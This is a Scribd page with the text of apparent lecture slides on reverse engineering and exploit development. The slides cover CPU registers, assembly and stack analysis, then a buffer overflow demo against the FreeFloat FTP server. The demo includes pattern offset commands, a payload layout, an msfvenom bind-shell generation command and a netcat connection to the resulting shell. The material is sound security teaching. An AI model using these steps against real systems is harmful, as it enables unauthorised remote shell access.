Scribd
Upload
349 views46 pages

Reverse Engineering with Metasploit

The document discusses reverse engineering and exploitation using Metasploit, covering topics like reverse engineering tools, x86 and 64-bit system architecture, assembly language, stack overflows, and demonstrating how to find vulnerabilities in programs by exploiting buffer overflows using Metasploit and generating shellcode with msfvenom. Prerequisites include understanding x86 and 64-bit systems architecture, assembly language, programming skills, and using debuggers like Immunity Debugger and x64dbg to analyze programs at the assembly level.

Uploaded by

erica jayasundera
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
349 views46 pages

Reverse Engineering with Metasploit

The document discusses reverse engineering and exploitation using Metasploit, covering topics like reverse engineering tools, x86 and 64-bit system architecture, assembly language, stack overflows, and demonstrating how to find vulnerabilities in programs by exploiting buffer overflows using Metasploit and generating shellcode with msfvenom. Prerequisites include understanding x86 and 64-bit systems architecture, assembly language, programming skills, and using debuggers like Immunity Debugger and x64dbg to analyze programs at the assembly level.

Uploaded by

erica jayasundera
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Reverse Engineering

Reverse Engineering and exploit development using


Metasploit

Priyal Walpita
[Link]
[Link]
● Importance of reverse
engineering
● Introduction to Tools
● Systems Architecture
● Assembly Language
● Stack overflow exploitation
● Metaspolit
● Shellcode
Importance of reverse engineering

● Malware analysis
● Develop against a closed
solution interfaces
● Understand and defend against
threats
● Find vulnerabilities
● Intellectual property theft
Prerequisites

● x86 and 64 bit systems


architecture
● Assembly language
● Programming ( C, C++, python)
● Compilers
● x86 Analysis
○ Immunity debugger
○ [Link]
ducts/debugger/
● 64 bit Debugger
○ X64dbg-x64
○ [Link]
● C++ IDE
○ [Link]
orwelldevcpp/
● Demo
Systems Architecture
● General CPU Registers
● 32 bit registers
● 64 bit registers
● Other Registers
● Assembly instructions
● Memory Segments
● Stack
General CPU Registers
32 bit Registers
General 64 bit Registers
Index Registers
Pointer Registers
Segment Registers
Flag Registers
Assembly
<Address> <opcode> <instruction/mnemonic> <operands>
Assembly
<Address> <opcode> <instruction/mnemonic> <operands>
Assembly
<Address> <opcode> <instruction/mnemonic> <operands>
Data Types
Memory Segments
Addressing mode
Little Endian
Code Analysis - Demo
Code Analysis - Demo 32 bit

Function Prolog
Code Analysis - Demo

64 bit
Stack
Stack
Stack Analysis
Stack Analysis
Stack Analysis
Stack Analysis
Write a simple C++ program with following
specification.

● A Function with a following signature

int Add(int a, int b)

● Call the Add function from the main


function and display the result in the
main function

● Demonstrate and analyze how the


stack , memory and opcodes behaves in
the immunity debugger
Stack Overflow - Demo
Exploitation Tools
● Immunity Debugger

[Link]
r/

● Exploits Database

[Link]

● Vulnerable FTP Server - FreeFloat FTP

[Link]
Attack the FTP Server - DEMO
FTP Attack : Locate the offset

● Use Metasploit Pattern create tool to generate a


pattern

● USer Metasploit Pattern offset tool to identify the


offset
Attack the FTP Server - DEMO

Make sure you have following tools

/usr/share/metasploit-framework/tools/exploit

pattern_create.rb
Pattern_offset.rb

● Attack the FTP server using the fuzzer


Attack the FTP Server - DEMO

● Generate the smart character pattern using


pattern_create.rb tool

./pattern_create.rb -l 1000

● Copy the output to your python fuzzer


program

● Attack the FTP server using the pattern


fuzzer

● Track the EIP value from the debugger tool


Attack the FTP Server - DEMO
● Generate the pattern offset using the
pattern_offset.rb

./pattern_offset.rb -q <the EIP value> -l 1000

● Determine the offset value

● Adjust the payload accordingly with


identifiable characters

● Eg : payload = “A” * 247 + “B” * 4 + “C” *


749

● Attack and test


B for the Instruction pointer
Attack the FTP Server - DEMO

Find the ESP jmp address


● We need to execute a jmp code in EIP
which points to our malicious shellcode

● Find the jmp esp command in the vulnerable


application

● Get the address of the jmp esp in [Link]

● Analyze the ESP area and the shell32 area


Attack the FTP Server - DEMO

Generate the shell code and attack


● Use msfvenom to generate the shellcode

msfvenom -p windows/shell_bind_tcp -b
‘\x00\x0A\x0D’ -f python

● Find the jmp esp command in the vulnerable


application

● Get the address of the jmp esp in [Link]

● Analyze the ESP area and the shell32 area

● Edit the python code


● Attack ! : nc -nv <ip> <port>
FTP Attack : Attack with shellcode
FTP Attack : Attack with shellcode

You might also like